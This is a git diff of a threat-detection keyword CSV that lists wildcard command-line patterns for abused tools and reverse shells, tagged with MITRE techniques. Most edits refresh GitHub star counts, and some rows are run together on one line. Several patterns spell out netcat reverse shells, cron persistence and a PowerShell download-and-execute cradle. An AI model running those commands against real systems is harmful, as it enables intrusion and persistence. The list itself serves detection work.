diff --git a/greyware_tool_keyword.csv b/greyware_tool_keyword.csv
index ad4e7f4b8..f79e1c4f4 100644
--- a/greyware_tool_keyword.csv
+++ b/greyware_tool_keyword.csv
@@ -1,15 +1,15 @@
 "keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at"
-"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "* /bin/nc * -e /bin/bash* > cron && crontab cron*","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "* /bin/nc * -e /bin/bash*> * crontab cron*","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "* /c sc query WinDefend*","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "* -accepteula -nobanner -d cmd.exe /c *","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation Tools","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"* --coin *--nicehash *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"* --coin *--nicehash *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "* dclist *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "* dir /s */ Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
-"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"* dropping source port zero packet from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "* -f *.dmp windows.cmdline*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "* -f *.dmp windows.dlllist --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "* -f *.dmp windows.filescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -35,11 +35,11 @@
 "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "* -Ix64 *.c -Ix86 *.c -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "* -Ix64 *.vba -Ix86 *.vba -P Inject -O *","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
-"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"* -jar ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "* -m SimpleHTTPServer *","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
 "* ncat * -e /bin/bash*|crontab*","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "* netscan.exe *","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
-"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
 "* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","N/A","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z"
 "* -sc trustdump*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -49,20 +49,20 @@ "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*%SystemRoot%\\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*&& telnet * 2>&1 &1 &3 2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" +"*.rclone.exe config*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*/AppFiles/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/bin/sh | nc*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell 
spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" "*/FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" 
@@ -151,10 +151,10 @@
 "*/github.com/*/raw/main/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
 "*/http-put-server.py*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "*/Ivy/Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*/Ivy/Loader/*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*/keygen.exe*","greyware_tool_keyword","_","generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares","T1204 - T1027 - T1059 - T1055 - T1060 - T1195","TA0005 - TA0002 - TA0011","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -165,7 +165,7 @@
 "*/netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
 "*/netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
 "*/netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
-"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
 "*/nmap-nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
 "*/nmap-scada*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
 "*/nmap-vulners*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
@@ -178,12 +178,12 @@
 "*/RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
 "*/s4n7h0/NSE*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
 "*/spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
-"*/updog-*.tar.gz*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
-"*/updog.git*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
-"*/updog/archive/updog-*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
-"*/xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*/xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
-"*/xmrig.git*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
